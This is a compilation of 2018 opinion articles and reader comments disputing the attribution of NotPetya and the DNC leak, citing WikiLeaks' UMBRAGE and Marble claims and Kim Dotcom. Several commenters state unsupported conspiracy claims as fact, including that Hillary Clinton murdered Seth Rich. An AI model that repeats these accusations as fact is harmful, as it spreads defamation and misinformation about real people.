A division of the Central Intelligence Agency stockpiled hacking techniques culled from other hackers, giving the agency the ability to leave behind the "fingerprints" of the outside hackers when it broke into electronic devices, the anti-secrecy group WikiLeaks alleges as it released thousands of documents Tuesday.

The article continues by pointing out:

The documents also suggest that one of the agency's divisions – the Remote Development Branch's UMBRAGE Group – may have been cataloguing hacking methods from outside hackers, including in Russia, that would have allowed the agency to mask their identity by employing the method during espionage. "With UMBRAGE and related projects the CIA cannot only increase its total number of attack types, but also misdirect attribution by leaving behind the 'fingerprints' of the groups that the attack techniques were stolen from," Wikileaks said in a statement.

Not only does this ability allow the CIA to carry out espionage that if discovered would be attributed to other parties, it also allows the CIA to conduct attacks the US government and its allies can then blame on foreign states for the purpose of politically maligning them, and even justifying otherwise indefensible acts of aggression, either militarily, or in the realm of cyberspace.

Evidence provided by the UK and US governments would have to establish Russia's role in the "NotPetya" cyberattack beyond mere attribution, since this is now confirmed to be possible to forge. The UK and US governments have failed to provide any evidence at all, likely because all it can offer is mere attribution which skeptics could easily point out might have been forged. NATO Had Been Preparing "Offensive" Cyber Weapons

As previously reported , NATO had been in the process of creating and preparing to deploy what it called an "offensive defense" regarding cyber warfare. Reuters in an article titled, " NATO mulls 'offensive defense' with cyber warfare rules ," would state:

A group of NATO allies are considering a more muscular response to state-sponsored computer hackers that could involve using cyber attacks to bring down enemy networks, officials said.

Reuters would also report:

The doctrine could shift NATO's approach from being defensive to confronting hackers that officials say Russia, China and North Korea use to try to undermine Western governments and steal technology.

It has been repeatedly pointed out how the US, UK and other NATO members have repeatedly used false pretexts to justify military aggression carried out with conventional military power. Examples include fabricated evidence of supposed "weapons of mass destruction (WMD)" preceding the 2003 US invasion of Iraq and the so-called "humanitarian war" launched against Libya in 2011 built on fabricated accounts from US and European rights advocates.

With UMBRAGE, the US and its allies now possess the ability to fabricate evidence in cyberspace, enabling them to accuse targeted nations of cyber attacks they never carried out, to justify the deployment of "offensive" cyber weapons NATO admits it has prepared ahead of time. While the US and European media have warned the world of a "cyber-911″ it appears instead we are faced with "cyber-WMD claims" rolled out to justify a likewise "cyber-Iraq War" using cyber weapons the US and its NATO allies have been preparing and seeking to use for years. Were Russia to really be behind the "NotPetya" cyberattack, the US and its allies have only themselves to blame for decades spent undermining their own credibility with serial instances of fabricating evidence to justify its serial military aggression. Establishing that Russia was behind the "NotPetya" cyberattack, however, will require more evidence than mere "attribution" the CIA can easily forge.

*

Ulson Gunnar is a New York-based geopolitical analyst and writer especially for the online magazine " New Eastern Outlook ".

All images in this article are from the author.

[Feb 19, 2018] The White House on Thursday blamed Russia for the devastating 'NotPetya' cyber attack last year , joining the British government in condemning Moscow for unleashing a virus

Notable quotes:
"... Poor Russia cant get a break, neither can Americans get a break from this USA 'get Russia' monkey circus. The monkeys now reach back a year ago to get Russia on a cyber attack. ..."
Feb 19, 2018 | www.unz.com

renfro, February 19, 2018 at 7:38 am GMT

Poor Russia cant get a break, neither can Americans get a break from this USA 'get Russia' monkey circus. The monkeys now reach back a year ago to get Russia on a cyber attack.

White House blames Russia for 'reckless' NotPetya cyber attack

https://www.reuters.com/ russia /white-house-blames-russia-for-reckless-notpetya-c&#8230 ;

3 days ago -- WASHINGTON/LONDON (Reuters) -- The White House on Thursday blamed Russia for the devastating 'NotPetya' cyber attack last year , joining the British government in condemning Moscow for unleashing a virus that crippled parts of Ukraine's infrastructure and damaged computers in countries across the

Best advice for Americans believe nothing, trust nothing that issues from a government.

The experts:

John McAfee, founder of an anti-virus firm, said: "When the FBI or when any other agency says the Russians did it or the Chinese did something or the Iranians did something -- that's a fallacy," said McAfee.

"Any hacker capable of breaking into something is extraordinarily capable of hiding their tracks. If I were the Chinese and I wanted to make it look like the Russians did it I would use Russian language within the code. "I would use Russian techniques of breaking into organisations so there is simply no way to assign a source for any attack -- this is a fallacy."

I can promise you -- if it looks like the Russians did it, then I can guarantee you it was not the Russians."

Wikileaks has released a number of CIA cyber tools it had obtained. These included software specifically designed to create false attributions.

[Feb 19, 2018] Kim Dotcom Let Me Assure You, The DNC Hack Wasn t Even A Hack Zero Hedge

Notable quotes:
"... All fucking Kabuki. All of it. ..."
"... The Deep State (Oligarchs and the MIC) is totally fucking loving this: they have Trump and the GOP giving them everything they ever wanted and they have the optics and distraction of an "embattled" president that claims to be against or a victim of the "deep state" and a base that rally's, circles the wagons around him, and falls for the narrative. ..."
"... They know exactly who it was with the memory stick, there is always video of one form or another either in the data center or near the premises that can indicate who it was. They either have a video of Seth Rich putting the stick into the server directly, or they at least have a video of his car entering and leaving the vicinity of the ex-filtration. ..."
"... This would have been an open and shut case if shillary was not involved. Since it was involved, you can all chalk it up to the Clinton body count. I pray that it gets justice. It and the country, the world - needs justice. ..."
Feb 19, 2018 | www.zerohedge.com

Kim Dotcom: "Let Me Assure You, The DNC Hack Wasn't Even A Hack"

by Tyler Durden Mon, 02/19/2018 - 07:51 3.4K SHARES

Kim Dotcom has once again chimed in on the DNC hack, following a Sunday morning tweet from President Trump clarifying his previous comments on Russian meddling in the 2016 election.

In response, Dotcom tweeted " Let me assure you, the DNC hack wasn't even a hack. It was an insider with a memory stick. I know this because I know who did it and why," adding "Special Counsel Mueller is not interested in my evidence. My lawyers wrote to him twice. He never replied. 360 pounds! " alluding of course to Trump's "400 pound genius" comment.

Dotcom's assertion is backed up by an analysis done last year by a researcher who goes by the name Forensicator , who determined that the DNC files were copied at 22.6 MB/s - a speed virtually impossible to achieve from halfway around the world, much less over a local network - yet a speed typical of file transfers to a memory stick.

The local transfer theory of course blows the Russian hacking narrative out of the water, lending credibility to the theory that the DNC "hack" was in fact an inside job, potentially implicating late DNC IT staffer, Seth Rich.

John Podesta's email was allegely successfully "hacked" (he fell victim to a phishing scam ) in March 2016, while the DNC reported suspicious activity (the suspected Seth Rich file transfer) in late April, 2016 according to the Washington Post.

On May 18, 2017, Dotcom proposed that if Congress includes the Seth Rich investigation in their Russia probe, he would provide written testimony with evidence that Seth Rich was WikiLeaks' source.

On May 19 2017 Dotcom tweeted "I knew Seth Rich. I was involved"

Three days later, Dotcom again released a guarded statement saying "I KNOW THAT SETH RICH WAS INVOLVED IN THE DNC LEAK," adding:

"I have consulted with my lawyers. I accept that my full statement should be provided to the authorities and I am prepared to do that so that there can be a full investigation. My lawyers will speak with the authorities regarding the proper process.

If my evidence is required to be given in the United States I would be prepared to do so if appropriate arrangements are made. I would need a guarantee from Special Counsel Mueller, on behalf of the United States, of safe passage from New Zealand to the United States and back. In the coming days we will be communicating with the appropriate authorities to make the necessary arrangements. In the meantime, I will make no further comment."

Dotcom knew.

While one could simply write off Dotcom's claims as an attention seeking stunt, he made several comments and a series of tweets hinting at the upcoming email releases prior to both the WikiLeaks dumps as well as the publication of the hacked DNC emails to a website known as "DCLeaks."

In a May 14, 2015 Bloomberg article entitled "Kim Dotcom: Julian Assange Will Be Hillary Clinton's Worst Nightmare In 2016 ": "I have to say it's probably more Julian," who threatens Hillary, Dotcom said. " But I'm aware of some of the things that are going to be roadblocks for her ."

Two days later, Dotcom tweeted this:

Around two months later, Kim asks a provocative question

Two weeks after that, Dotcom then tweeted "Mishandling classified info is a crime. When Hillary's emails eventually pop up on the internet who's going to jail?"

It should thus be fairly obvious to anyone that Dotcom was somehow involved, and therefore any evidence he claims to have, should be taken seriously as part of Mueller's investigation. Instead, as Dotcom tweeted, "Special Counsel Mueller is not interested in my evidence. My lawyers wrote to him twice. He never replied. "

chunga Sun, 02/18/2018 - 21:59 Permalink

Pffft...this guy sounds like the reds with their "blockbuster" memo. Honest Hill'rey is laughing!

SethPoor -> chunga Sun, 02/18/2018 - 22:00 Permalink

https://www.youtube.com/watch?v=5_8VaMbPjUU

Bes -> J S Bach Sun, 02/18/2018 - 22:17 Permalink

All fucking Kabuki. All of it.

The Deep State (Oligarchs and the MIC) is totally fucking loving this: they have Trump and the GOP giving them everything they ever wanted and they have the optics and distraction of an "embattled" president that claims to be against or a victim of the "deep state" and a base that rally's, circles the wagons around him, and falls for the narrative.

Meanwhile they keep enacting the most Pro Deep State/MIC/Police State/Zionist/Wall Street agenda possible. And they call it #winning

----

pathetic.

bigkahuna -> CheapBastard Mon, 02/19/2018 - 09:58 Permalink

"Had to be a Russian mole with a computer stick. MSM, DNC and Muller say so."

They know exactly who it was with the memory stick, there is always video of one form or another either in the data center or near the premises that can indicate who it was. They either have a video of Seth Rich putting the stick into the server directly, or they at least have a video of his car entering and leaving the vicinity of the ex-filtration.

This would have been an open and shut case if shillary was not involved. Since it was involved, you can all chalk it up to the Clinton body count. I pray that it gets justice. It and the country, the world - needs justice.

StarGate -> CheapBastard Mon, 02/19/2018 - 11:23 Permalink

Don't forget the "hack" analysis of Russian owned "Crowdstrike" since the FBI did and continues to, refuse to analyze the DNC computers.

KuriousKat -> CheapBastard Mon, 02/19/2018 - 13:26 Permalink

Isn't Alperovitch the Only Russian in there?.. When you rule out the impossible...whatever remains probable.. probably is..

wildbad -> IntercoursetheEU Mon, 02/19/2018 - 03:05 Permalink

Kim is great, Assange is great. Kim is playing a double game. He wants immunity from the US GUmmint overreach that destroyed his company and made him a prisoner in NZ.

Good on ya Kim.

His name was Seth Rich...and he will reach out from the grave and bury Killary who murdered him.

NumberNone -> wildbad Mon, 02/19/2018 - 10:04 Permalink

There are so many nuances to this and all are getting mentioned but the one that also stands out is that in an age of demands for gun control by the Dems, Seth Rich is never, ever mentioned. He should be the poster child for gun control. Young man, draped in a American flag, helping democracy, gunned down...it writes itself.

They either are afraid of the possible racial issues should it turn out to be a black man killing a white man (but why should that matter in a gun control debate?) or they just don't want people looking at this case. I go for #2.

Socratic Dog -> Buckaroo Banzai Mon, 02/19/2018 - 12:09 Permalink

Funny that George Webb can figure it out, but Trump, Leader of the Free World, is sitting there with his dick in his hand waiting for someone to save him.

Whatever he might turn out to be, this much is clear: Trump is a spineless weakling. He might be able to fuck starlets, but he hasn't got the balls to defend either himself or the Republic.

verumcuibono -> Buckaroo Banzai Mon, 02/19/2018 - 14:26 Permalink

Webb's research is also...managed. But a lot of it was/is really good (don't follow it anymore) and I agree re: SR piece of it.

I think SR is such an interesting case. It's not really an anomaly because SO many Bush-CFR-related hits end the same way and his had typical signatures. But his also squeels of a job done w/out much prior planning because I think SR surprised everyone. If, in fact, that was when he was killed. Everything regarding the family's demeanor suggests no.

verumcuibono -> NumberNone Mon, 02/19/2018 - 12:41 Permalink

MANY patterns in shootings: failure in law enforcement/intelligence who were notified of problem individuals ahead of time, ARs, mental health and SSRIs, and ongoing resistance to gun control in DC ----these are NOT coincidences. Nor are distractions in MSM's version of events w/ controlled propaganda.

Children will stop being killed when America wakes the fuck up and starts asking the right questions, making the right demands. It's time.

KJWqonfo7 -> wildbad Mon, 02/19/2018 - 11:15 Permalink

Kim is awesome to watch, I remember his old website of pics of him on yachts with hot girls and racing the Gumball Rally.

verumcuibono -> wildbad Mon, 02/19/2018 - 14:28 Permalink

I don't think you know how these hackers have nearly ALL been intercepted by CIA--for decades now. DS has had backdoor access to just about all of them. I agree that Kim is great, brilliant and was sabotaged but he's also cooperating. Otherwise he'd be dead.

StarGate -> Billy the Poet Mon, 02/19/2018 - 11:48 Permalink

Bes is either "disinfo plant" or energy draining pessimist. Result is the same - to deflate your power to create a new future.

Trump saw the goal of the Fed Reserve banksters decades ago and spoke often about it. Like Prez Kennedy he wants to return USA economy to silver or gold backed dollar then transition to new system away from the Black Magic fed reserve/ tax natl debt machine.

The Globalist Cabal has been working to destroy the US economy ever since they income tax April 15th Lincoln at the Ford theater. 125 years. But Bes claims because Trump cannot reverse 125 years of history in one year that it is kabuki.

Pessimism is its own reward.

[Feb 18, 2018] Both agencies were complicit in the most infamous assassinations and false flag episodes since the Kennedy/MLK Vietnam days. Don't forget Air America CIA drug running and Iran/Contra / October Surprise affairs.

Notable quotes:
"... The Dulles brothers, with Allan as head of Sullivan and Cromwells' CIA were notorious facilitators for the international banksters and their subsidiary corporations which comprise the largest oil and military entities which have literally plainly stated in writing, need to occasionally "GALVANIZE" the American public through catastrophic and catalyzing events in order for Americans to be terrified into funding and fighting for those interlocked corporations in their quest to spread "FULL SPECTRUM DOMINANCE," throughout the globe. ..."
"... The book by Peter Dale Scott, "The American Deep State Wall Street, Big Oil And the Attack on American Democracy" covers in detail some of the points you mention in your reply. It is a fascinating book. ..."
Feb 18, 2018 | consortiumnews.com

Lee Anderson , February 17, 2018 at 4:32 pm

Your link to the Giraldi piece is appreciated, however, Giraldi starts off on a false premise: He claims that people generally liked and trusted the FBI and CIA up until or shortly after 9/11. Not so! Both agencies were complicit in the most infamous assassinations and false flag episodes since the Kennedy/MLK Vietnam days. Don't forget Air America CIA drug running and Iran/Contra / October Surprise affairs.

The Dulles brothers, with Allan as head of Sullivan and Cromwells' CIA were notorious facilitators for the international banksters and their subsidiary corporations which comprise the largest oil and military entities which have literally plainly stated in writing, need to occasionally "GALVANIZE" the American public through catastrophic and catalyzing events in order for Americans to be terrified into funding and fighting for those interlocked corporations in their quest to spread "FULL SPECTRUM DOMINANCE," throughout the globe.

The political parties are theatre designed to fool the people into believing we are living in some sort of legitimate, representative system, when it's the same old plutocracy that manages to get elected because they've long figured out the art of polarizing people and capitalising on tribal alignments.

We should eliminate all government for a time so that people can begin to see that corporations really do and most always have run the country.

It's preposterous to think the stupid public is actually discussing saddling ourselves and future generations with gargantuan debt through a system designed and run by banksters!

it should be self evident a sovereign nation should maintain and forever hold the rights to develop a monetary/financial system that serves the needs of the people, not be indentured servants in a financial system that serves the insatiable greed of a handful of parasitic banksters and corporate tycoons!

Joe Tedesky , February 17, 2018 at 5:08 pm

You are so right, in fact Robert Parry made quite a journalistic career out of exposing the CIA for such things as drug running. I gave up on that agency a longtime ago, after JFK was murdered, and I was only 13 then. Yeah maybe Phil discounts the time while he worked for the CIA, but the CIA has many, many rooms in which plots are hatched, so the valiant truth teller Giraldi maybe excused this one time for his lack of memory .I guess, right?

Good comment Lee. Joe

Annie , February 17, 2018 at 5:56 pm

Yes, but he's referring to the public's opinion of these agencies, and if they didn't continue to retain, even after 9/11, a significant popularity in the public's mind how would we have so many American's buying into Russia-gate? In my perception of things they only lost some ground after 9/11, but Americans notoriously have a short memory span.

Gregory Herr , February 17, 2018 at 6:42 pm

And films that are supposed to help Americans feel good about the aims and efficacy of the agencies like Zero Dark Thirty and Argo are in the popular imagination.

Skeptigal , February 17, 2018 at 7:19 pm

The book by Peter Dale Scott, "The American Deep State Wall Street, Big Oil And the Attack on American Democracy" covers in detail some of the points you mention in your reply. It is a fascinating book.

[Feb 16, 2018] Russians Spooked by Nukes-Against-Cyber-Attack Policy Consortiumnews

Feb 16, 2018 | consortiumnews.com

Russians Spooked by Nukes-Against-Cyber-Attack Policy February 16, 2018

New U.S. policy on nuclear retaliatory strikes for cyber-attacks is raising concerns, with Russia claiming that it's already been blamed for a false-flag cyber-attack – namely the election hacking allegations of 2016, explain Ray McGovern and William Binney.

By Ray McGovern and William Binney

Moscow is showing understandable concern over the lowering of the threshold for employing nuclear weapons to include retaliation for cyber-attacks, a change announced on Feb. 2 in the U.S. Nuclear Posture Review (NPR).

A nuclear test detonation carried out in Nevada on April 18, 1953.

Explaining the shift in U.S. doctrine on first-use, the NPR cites the efforts of potential adversaries "to design and use cyber weapons" and explains the change as a "hedge" against non-nuclear threats. In response, Russia described the move as an "attempt to shift onto others one's own responsibility" for the deteriorating security situation.

Moscow's concern goes beyond rhetoric. Cyber-attacks are notoriously difficult to trace to the actual perpetrator and can be pinned easily on others in what we call "false-flag" operations. These can be highly destabilizing – not only in the strategic context, but in the political arena as well.

Russian President Vladimir Putin has good reason to believe he has been the target of a false-flag attack of the political genre. We judged this to be the case a year and a half ago, and said so. Our judgment was fortified last summer – thanks to forensic evidence challenging accusations that the Russians hacked into the Democratic National Committee and provided emails to WikiLeaks. (Curiously, the FBI declined to do forensics, even though the "Russian hack" was being described as an "act of war.")

Our conclusions were based on work conducted over several months by highly experienced technical specialists, including another former NSA technical director (besides co-author Binney) and experts from outside the circle of intelligence analysts.

On August 9, 2017, investigative reporter Patrick Lawrence summed up our findings in The Nation. "They have all argued that the hack theory is wrong and that a locally executed leak is the far more likely explanation," he explained.

As we wrote in an open letter to Barack Obama dated January 17, three days before he left office, the NSA's programs are fully capable of capturing all electronic transfers of data. "We strongly suggest that you ask NSA for any evidence it may have indicating that the results of Russian hacking were given to WikiLeaks," our letter said. "If NSA cannot produce such evidence – and quickly – this would probably mean it does not have any."

A 'Dot' Pointing to a False Flag?

In his article, Lawrence included mention of one key, previously unknown "dot" revealed by WikiLeaks on March 31, 2017. When connected with other dots, it puts a huge dent in the dominant narrative about Russian hacking. Small wonder that the mainstream media immediately applied white-out to the offending dot.

Lawrence, however, let the dot out of the bag, so to speak: "The list of the CIA's cyber-tools WikiLeaks began to release in March and labeled Vault 7 includes one called Marble Framework that is capable of obfuscating the origin of documents in false-flag operations and leaving markings that point to whatever the CIA wants to point to."

If congressional oversight committees summon the courage to look into "Obfus-Gate" and Marble, they are likely to find this line of inquiry as lucrative as the Steele "dossier." In fact, they are likely to find the same dramatis personae playing leading roles in both productions.

Two Surprising Visits

Last October CIA Director Mike Pompeo invited one of us (Binney) into his office to discuss Russian hacking. Binney told Pompeo his analysts had lied and that he could prove it.

In retrospect, the Pompeo-Binney meeting appears to have been a shot across the bow of those cyber warriors in the CIA, FBI, and NSA with the means and incentive to adduce "just discovered" evidence of Russian hacking. That Pompeo could promptly invite Binney back to evaluate any such "evidence" would be seen as a strong deterrent to that kind of operation.

Pompeo's closeness to President Donald Trump is probably why the heads of Russia's three top intelligence agencies paid Pompeo an unprecedented visit in late January. We think it likely that the proximate cause was the strategic danger Moscow sees in the nuclear-hedge-against-cyber-attack provision of the Nuclear Posture Statement (a draft of which had been leaked a few weeks before).

If so, the discussion presumably focused on enhancing hot-line and other fail-safe arrangements to reduce the possibility of false-flag attacks in the strategic arena -- by anyone – given the extremely high stakes.

Putin may have told his intelligence chiefs to pick up on President Donald Trump's suggestion, after the two met last July, to establish a U.S.-Russian cyber security unit. That proposal was widely ridiculed at the time. It may make good sense now.

Ray McGovern, a CIA analyst for 27 years, was chief of the Soviet Foreign Policy Branch and briefed the President's Daily Brief one-on-one from 1981-1985. William Binney worked for NSA for 36 years, retiring in 2001 as the technical director of world military and geopolitical analysis and reporting; he created many of the collection systems still used by NSA.


mike k , February 16, 2018 at 5:36 pm

Those Russians had a strange mission coming to CIA headquarters to try to negotiate with soulless mass murderers in the name of maintaining a precarious semblance of peace, knowing full well that these men's words and assurances were worth less than nothing. Ah well, I guess in a mad situation one is reduced to making desperate gestures, hoping against hope .

Mild-ly -Facetious , February 16, 2018 at 5:42 pm

F Y I :> Putin prefers Aramco to Trump's sword dance

Hardly 10 months after honoring the visiting US president, the Saudis are open to a Russian-Chinese consortium investing in the upcoming Aramco IPO

By M.K. BHADRAKUMAR
FEBRUARY 16, 2018

[extract]

In the slideshow that is Middle Eastern politics, the series of still images seldom add up to make an enduring narrative. And the probability is high that when an indelible image appears, it might go unnoticed – such as Russia and Saudi Arabia wrapping up huge energy deals on Wednesday underscoring a new narrative in regional and international security.

The ebb and flow of events in Syria – Turkey's campaign in Afrin and its threat to administer an "Ottoman slap" to the United States, and the shooting down of an Israeli F-16 jet – hogged the attention. But something of far greater importance was unfolding in Riyadh, as Saudi and Russian officials met to seal major deals marking a historic challenge to the US dominance in the Persian Gulf region.

The big news is the Russian offer to the Saudi authorities to invest directly in the upcoming Aramco initial public offering – and the Saudis acknowledging the offer. Even bigger news, surely, is that Moscow is putting together a Russian-Chinese consortium of joint investment funds plus several major Russian banks to be part of the Aramco IPO.

Chinese state oil companies were interested in becoming cornerstone investors in the IPO, but the participation of a Russia-China joint investment fund takes matters to an entirely different realm. Clearly, the Chinese side is willing to hand over tens of billions of dollars.

Yet the Aramco IPO was a prime motive for US President Donald Trump to choose Saudi Arabia for his first foreign trip. The Saudi hosts extended the ultimate honor to Trump – a ceremonial sword dance outside the Murabba Palace in Riyadh. Hardly 10 months later, they are open to a Russian-Chinese consortium investing in the Aramco IPO.

Riyadh plans to sell 5% of Saudi Aramco in what is billed as the largest IPO in world history. In the Saudi estimation, Aramco is worth US$2 trillion; a 5% stake sale could fetch as much as $100 billion. The IPO is a crucial segment of Vision 2030, Saudi Crown Prince Mohammad bin Salman's ambitious plan to diversify the kingdom's economy.

MORE : http://www.atimes.com/article/putin-prefers-aramco-trumps-sword-dance/

Anna , February 16, 2018 at 6:46 pm

"Last October CIA Director Mike Pompeo invited one of us (Binney) into his office to discuss Russian hacking. Binney told Pompeo his analysts had lied and that he could prove it."

That was about some Dm. Alperovitch for CrowdStrike fame, who had discovered the "hacking" in 10 sec. Guess Alperovitch, as an "expert" at the viciously Russophobic Atlantic Council (funded by the State Dept., NATO, and a set of unsavory characters like Ukrainian oligrach Pinchuk) decided to show his "understanding" of the task. The shy FBI did not even attempt to look at the Clinton's server because the bosses "knew better."

Alperovitch must be investigated for anti-American activities; the scoundrel has been sowing discord into the US society with his lies while endangering the US citizenry.

[Feb 16, 2018] White House: Iraq Has Anthrax Virus Russia Launched NotPetya

Notable quotes:
"... Washington Post ..."
Feb 16, 2018 | www.moonofalabama.org

Late last night the White House accused the Russian military of having launched the destructive "NotPetya" malware which in June 2017 hit many global companies:

Statement from the Press Secretary

In June 2017, the Russian military launched the most destructive and costly cyber-attack in history.

The attack, dubbed "NotPetya," quickly spread worldwide, causing billions of dollars in damage across Europe, Asia, and the Americas. It was part of the Kremlin's ongoing effort to destabilize Ukraine and demonstrates ever more clearly Russia's involvement in the ongoing conflict. This was also a reckless and indiscriminate cyber-attack that will be met with international consequences.

The statement has the same quality as earlier statements about Spain sinking the Maine or about Saddam's Weapons of Mass Destruction had.

Neither the U.S. nor anyone else has presented ANY evidence of ANY Russian involvement in the creation or distribution of the NotPetya malware. The U.S. is simply asserting this while presenting nothing to back it up.

There is, in general, no attribution possible for any such cyber attack. As John McAfee, founder of an anti-virus firm, said :

"When the FBI or when any other agency says the Russians did it or the Chinese did something or the Iranians did something – that's a fallacy," said McAfee.
...
" Any hacker capable of breaking into something is extraordinarily capable of hiding their tracks. If I were the Chinese and I wanted to make it look like the Russians did it I would use Russian language within the code. "I would use Russian techniques of breaking into organisations so there is simply no way to assign a source for any attack – this is a fallacy."
...
I can promise you – if it looks like the Russians did it, then I can guarantee you it was not the Russians ."

I agree with McAfee's statement. The CIA must likewise agree. Wikileaks has released a number of CIA cyber tools it had obtained. These included software specifically designed to create false attributions:

The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA cannot only increase its total number of attack types but also misdirect attribution by leaving behind the "fingerprints" of the groups that the attack techniques were stolen from.

Nearly all "attributes" used for attributing a cyber attack can be easily faked to accuse a party not involved in the attack.

The British National Cyber Security Center, part of the British computer spying organisation GCHQ, also claims that the Russian military is " almost certainly " responsible for the NotPetya attack. Canada and the Australians also chipped in .

But note - these are NOT independent sources. They are, together with New Zealand, part of the of the " Five Eyes " spying alliance. From NSA files released by Edward Snowden we know that the Five Eyes are practically led by the U.S. National Security Agency:

One internal document quotes the head of the NSA, Lieutenant General Keith Alexander, on a visit to Menwith Hill in June 2008, asking: "Why can't we collect all the signals all the time? Sounds like a good summer project for Menwith."

Menwith Hill is a Royal Airforce spying station and part of the GCHQ infrastructure. That the head of the NSA can assign "summer projects" to it shows where the real power lies.

The Russian government strongly rejects the accusations.

NotPetya was a destructive virus that masked as ransomware. It was based on attacking tools which originally had been developed by the NSA but were later anonymously published by someone calling himself Shadow-Broker. One of several attack vectors NotPetya used was the update mechanism of some tax accounting software which is common in Ukraine and Russia. But the attack soon spread globally :

The attack hit Ukraine central bank, government computers, airports, the Kiev metro, the state power distributor Ukrenergo, Chernobyl's radiation monitoring system, and other machines in the country. It also affected Russian oil giant Rosneft, DLA Piper law firm, U.S. biopharmaceutical giant Merck, British advertiser WPP, and Danish shipping and energy company Maersk, among others.

The biggest damaged through NotPetya occurred at the Danish shipping company Maersk which had to completely reboot its entire infrastructure and lost some $250-300 million due to the attack.

The question one must always ask when such accusations are made is: Why would the accused do this?

In January the U.S. attribution claims about the NotPetya malware were prelaunched through the Washington Post :

The CIA has attributed to Russian military hackers a cyberattack that crippled computers in Ukraine last year, an effort to disrupt that country's financial system amid its ongoing war with separatists loyal to the Kremlin.
...
The GRU military spy agency created NotPetya, the CIA concluded with "high confidence" in November, according to classified reports cited by U.S. intelligence officials.
...
The hackers worked for the military spy service's GTsST, or Main Center for Special Technology, the CIA reported. That unit is highly involved in the GRU's cyberattack program, including the enabling of influence operations.

What could have been the motive of the "Russian military" to release a (badly written) malware that destroys computer-files of random companies all over the world including at the all important Russian oil-giant Rosneft . To assume that Ukraine's financial system was the target is almost certainly wrong. There is also no evidence that this was the case. Ukraine's Central Bank was just one of thousands of victims of the attack.

Only some 50% of the affected companies were in Ukraine. Most of them were not financial firms. The attack was initiated through an update mechanism of an accounting software that is also used in Russia. That original attack vector was probably chosen simply because it was easy to use. The accounting software company had a lousy security protection. The first infected computers then applied a different mechanism to spread the malware to other machines. The attack was launched on a Ukrainian national holiday which is not optimal if one wants to spread it as wide as possible throughout the Ukraine.

That the Ukraine and Russia were hit first by the malware was also likely just a time-of-day question. The timeline shows that the U.S. and most of western-Europe were still asleep when the virus started to proliferate. The anti-virus organizations, the Russian company Kaspersky among them , took only a few hours to diagnose the attacking software. A solution to prevent further damage was found within some twelve hours. By the time the U.S. working day started anti-virus companies were already releasing advise and protective code against it. If the attack had not been stopped by protective software it would have effected many more computers. Most of these would not have been in the Ukraine.

The U.S. attribution of the NotPetya attack to some Russian organization is extremely doubtful. In general a certain attribution of any such cyber attack is impossible. It is easy for any sophisticated virus writer to modify the code so that it looks as if it was written by some third party. The CIA even develops tools to do exactly that.

The attacking software seemed to be of relatively low quality. It was a badly designed mishmash created from earlier known malware and spy tools. It was not confined to a certain country or target. It can at best be described as an act of random vandalism on a global scale. There is no discernible motive for any Russian state organizations to release such nonsense.

In 2009 Russia offered an international treaty to prohibit cyber attacks. It was the U.S. under Obama which rejected it as "unnecessary" while it was expanding its own attack capabilities.

The U.S. government has launched a Cold War 2.0 against Russia. The motive for that seems to be mostly monetary. Hunting a few 'terrorists' does not justify big military budgets, opposing a nuclear power does.

The now released accusations against Russia have as much foundation in reality as the claims of alleged Iraqi WMDs. We can only hope that these new accusations will have less severe consequences.

Posted by b on February 16, 2018 at 04:30 AM | Permalink

Comments


uncle tungsten , Feb 16, 2018 4:53:27 AM | 1

Trump has made a fool of himself by agreeing to be the mouth for some looney security briefing. Why the White House releasing this? why not the NSA or some slightly distant body so the president can be kept clear of blowback if the accusation is proven to be wrong (as it has and was at the time of its spread). A gullible fool is spouting at the behest of the five anuses. They certainly aren't eyes with that sh!t coming out.
igybundy , Feb 16, 2018 5:44:44 AM | 2
Some of the smartest hackers I seen are Russians, although a lot of kids will just do it for kicks, professionals would have a target rather than random targets that can back fire aka how the US does things as we seen off their Iranian attack.

Kaspersky being the best of the best, Kremlin would know and would make great effort to make sure they stay as far away from them as possible. To give it a fighting chance. That Kaspersky found it so fast shows it was not Russian. Since you want them to be last on the list to know about it. Kaspersky for some strange reason also works with their partners in the US/UK etc sharing information. So Russians themselves would work to defeat a Russian attack even if its made. Which any smart cookie would say is self defeating and they would not waste the effort to try.


Jen , Feb 16, 2018 5:55:09 AM | 3
Could the attack have been co-ordinated by parties in different countries but in the same time zone or in neighbouring time zones, with one or two of these being the same time zones that European Russia is in?

It seems possible that at least one of these parties might be based in Ukraine. For Ukrainian-based pro-Maidan cyber-hackers to release the virus on a Ukrainian public holiday, when most major public and private institutions and businesses are closed, but Russian ones are not, would make sense. Another party could be based in a different country with sophisticated cyber-technology and experience in creating and spreading cyber-viruses that is in the same time zone as Ukraine. Israel comes to mind.

Ian , Feb 16, 2018 6:11:01 AM | 4
I don't believe anything will come of it. I see these accusations as petty attempts to get under Russia's skin. Frankly, I can't see anybody believing the crap that comes out of Washington's mouth, especially after what Snowden/Wikileaks has revealed to the public.
Me , Feb 16, 2018 6:30:32 AM | 5
These Russians are so badass!
I'm beginning to wish to be a Russian. :)
Partisan , Feb 16, 2018 6:35:18 AM | 6
"Some of the smartest hackers I seen are Russians, ....."

I am curious where have you seen them?

Second thing which I've never understood about hacking is, why all this noise about it. It is like a pc and network infrastructures are like holly grail and untouchable. The fetishization of this particular technology which comes from the west is unbearable, it is like the life on earth depend on it. Than can not be further from the truth. The US behaves as the owner and guardian of the IT sector, and they handsomely profited from it.

If someone leave its nodes exposed or on the Internet than it is their fault, why not hack it. To hell with them. If someone leave sensitive documents on server than again that's the owner problem, and so on. It is not a bigger crime than "regular" spying activity.

The Russian hacking is beyond the point. Two big powers, capitalist countries with almost identical political structure are competing in the world arena. One of them in decline big time, the second one resurgent but stagnant in development and to gain wider influence. The USA is clearly unable to bribe (as used to) Russia although countries such North Korea still suffer from their collusion in the Security council.

Hacking someone's IT infrastructure is mature skill and there is nothing new in it so just like everything else everything the US and its organs are saying is plain lie. Now, the problem is that after a lie follow some kind of coercion. It that doesn't work - if you are small and defenseless country - than they will kill you.

Red Ryder , Feb 16, 2018 6:49:23 AM | 7
There are at least two tactics in cyberwarfare (which this is).
First, to attack and destroy infrastructure of an enemy or opponent or resistant vassal.
Second, to place blame on others for the use of cyber as a weapon.

The US is at cyber war with Russia and China. This is not Cold War.
Neither was Stuxnet. That was cyber war on Iran. It got out beyond Iran because its careless design sought Seimens equipment everywhere on the Internet. It went to many other countries far beyond Iran and attacked the equipment there.

This malware was not well-designed either. It may have been meant for Russian targets. Rosneft is a huge economic target.

